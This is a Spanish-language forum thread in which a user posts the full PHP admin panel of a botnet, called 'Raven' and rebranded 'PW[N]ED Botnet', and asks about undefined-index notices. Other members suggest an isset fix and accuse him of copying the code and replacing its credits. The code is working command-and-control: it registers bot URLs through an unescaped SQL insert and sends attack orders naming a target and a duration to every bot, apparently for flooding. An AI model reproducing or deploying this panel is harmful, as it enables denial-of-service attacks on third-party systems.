Miren este lindo error que encontre en la botnet raven de undercode ;
Notice: Undefined index: target in /opt/lampp/htdocs/Raven/admin.php on line 10
Notice: Undefined index: time in /opt/lampp/htdocs/Raven/admin.php on line 11
Notice: Undefined index: bot in /opt/lampp/htdocs/Raven/admin.php on line 12
y las lineas son estas
$obj=$_POST['target'];
$tiempo=$_POST['time'];
$bot=htmlentities($_POST['bot'], ENT_QUOTES);
el codigo entero es este
<?
session_start();
if ($_SESSION['estado']!="log") {
echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php">';
}
else {
//insert bot
$obj=$_POST['target'];
$tiempo=$_POST['time'];
$bot=htmlentities($_POST['bot'], ENT_QUOTES);
include('config.php');
$exts=explode(".", $bot);
$exts2=end($exts);
if(isset($_POST['add'])) {
//control ext
if(!filter_var($bot, FILTER_VALIDATE_URL)){
echo "<script>alert('Ingrese una url valida!'); </script>";
}
elseif($exts2!="php"){
echo "<script>alert('No se encontro un script valido en la url!'); </script>";
}
//
else{
$bot2=str_ireplace("http://", "", $bot);
$bot3=explode("/", $bot2);
$corta=explode("/", $bot2);
unset($corta[0]);
$path=implode("/", $corta);
$ip=gethostbyname($bot3[0]);
$flag=file_get_contents("http://geoip.wtanaka.com/cc/".$ip);
$insert="INSERT INTO bots (ip, host, path, location) VALUES('$ip', '$bot3[0]', '$path', '$flag');";
$cons=mysqli_query($conexion, $insert);
}
}
//attack
//coneccion bot
//cabeceras http
$encod="target=".$obj."&time=".$tiempo."&start=Attack%21";
$long=strlen($encod);
if(isset($_POST['start'])) {
$consulta="SELECT host,path FROM bots;";
$consulta2=mysqli_query($conexion, $consulta);
while($data=mysqli_fetch_array($consulta2, MYSQLI_ASSOC)){
$socket=fsockopen($data['host'], 80);
fputs($socket, "POST /".$data['path']." HTTP/1.0\r\n");
fputs($socket, "Host: ".$data['host']."\r\n");
fputs($socket, "Content-Type: application/x-www-form-urlencoded\r\n");
fputs($socket, "Content-Length:". $long."\r\n\r\n");
fputs($socket, $encod);
fclose($socket);
}
}
//bots count
$num="SELECT * FROM bots;";
$num1=mysqli_query($conexion, $num);
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//ES" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<meta charset="UTF-8">
<meta name="author" content="[Q]3rV[0]" />
<meta name="language" content="spanish" />
<meta http-equiv="Content-Type" content="text/html" />
<title>PW[N]ED Botnet v1.0 | ForoMalware</title>
<link rel="icon" href="img/favicon.ico" type="image/x-icon" />
<link type="text/css" rel="stylesheet" href="css/raven.css" />
<script type="text/javascript" src="js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="js/jquery.easing.1.2.js"></script>
<script type="text/javascript" src="js/jquery.prettyPhoto.js"></script>
<script type="text/javascript" src="js/cufon-yui.js"></script>
<script type="text/javascript" src="js/Sansation_700.font.js"></script>
<script type="text/javascript" src="js/Sansation_400.font.js"></script>
<script type="text/javascript" src="js/Sansation_300.font.js"></script>
<script type="text/javascript" src="js/common.js"></script>
<script type="text/javascript" src="js/raven.js"></script>'; ?>
<script type="text/javascript" src="lib/DD_belatedPNG_0.0.8a-min.js"></script>
<script>
DD_belatedPNG.fix(".ie6PNGfix , .commonLink");
/* string argument can be any CSS selector */
/* .ie6PNGfix example is unnecessary */
/* change it to what suits you! */
</script>
<?php echo '</head>
<body>
<div id="headerContainer">
<a name="pageTopAnchor"></a>
<a href="index.php" id="logo" class="ie6PNGfix"></a>
<div id="titleWrapper">
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
<p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
</div>
</div>
<div id="bodyContainer2">
<div id="navigationContainer">
<ul class="rootnav">
<li><a href="logout.php">logout</a></li>
</ul>
</div>
<div id="servicesContentContainer">
<div id="servicesContainer">
<div id="servicesBigInfo">
<br />
<form action="#" method="POST">
<center>
<h3 id="servicesProductsHeader">Add Bot <img src=img/add.png height=40 weight=40></h3><br />
Raven URL: <input class="url" name="bot" value="" type="text" />
<br /><br />
<input type="submit" class="btn" name="add" value="Add Bot">
<br />
</center>
</form>
<center>
<a href=bots.php target="blank">Bots: '.mysqli_num_rows($num1).'</a>
<hr><br />
<div class="item"></div>
<h3 id="servicesProductsHeader">Attack <img src=img/attack.png height=40 weight=40></h3><br />
<form action="#" method="POST">
Target URL/IP: <input class="url" name="target" value="" /> Time: <input class="url2" name="time" value="" />
<br /><br />
<input type="submit" class="btn" name="start" value="Attack!">
</form>
</center>
</div>
</div>
</div>
<div class="clearBoth"></div>
</div>
<br />
</body>
</html>';
}
?>
No la he probado, asique no se como es, pero has ingresado correctamente todos los campos? has revisado que el resto de las cosas funcionen? puede ser que el hosting haya quitado alguna función y por eso se produce el error.
Subelo a otro host, lo pruebas y si te sigue dando el mismo error, me avisas, lo descargo lo testeo y te digo :)
Un saludo.
ahi deberia aver un isset en el envio de esta manera no sale ese error, es decir si se envia el formulario, entonces esas variables si existen sino no existen :P
<div id="titleWrapper">
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
<p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
</div>
WTF?
salu2
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
ahi deberia aver un isset en el envio de esta manera no sale ese error, es decir si se envia el formulario, entonces esas variables si existen sino no existen :P
<div id="titleWrapper">
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
<p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
</div>
WTF?
salu2
Ningun WTF!! Claro como el agua un C&P :D
Ripper detected :3
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
<p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
Se agradece el reporte del bug, pero ni siquiera entras en la categoria de script kiddie... es LAMMERtable tu actitud de modificar el codigo fuente y ponerle tus creditos... asi es como agradeces el trabajo de Cuervo y de todo underc0de que se esforzo y le dedico tiempo al proyecto?
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
<p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
Si se supone que la hiciste tu deberías saber arreglar el bug...
Pues si, un tanto lamentable...
FAIL.
Desde luego que eso que has hecho esta muy mal.
Esto se desvió del post original, una lastima la actitud del usuario.
TEMA CERRADO.